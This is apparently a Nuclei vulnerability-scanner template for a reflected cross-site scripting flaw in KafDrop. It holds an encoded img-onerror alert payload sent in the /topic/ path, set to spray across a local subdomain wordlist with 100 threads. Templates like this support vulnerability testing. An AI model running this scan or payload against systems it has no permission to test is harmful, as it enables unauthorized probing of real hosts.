id: kafdrop-xss
info:
  name: KafDrop XSS
  author: dhiyaneshDk
  severity: medium
  tags: kafdrop,xss
  description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server.
  reference: https://github.com/HomeAdvisor/Kafdrop/issues/12
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Kafdrop'
          - '<img src=x onerror=alert(2)>'
        part: body
        condition: and
      - type: status
        status:
          - 500
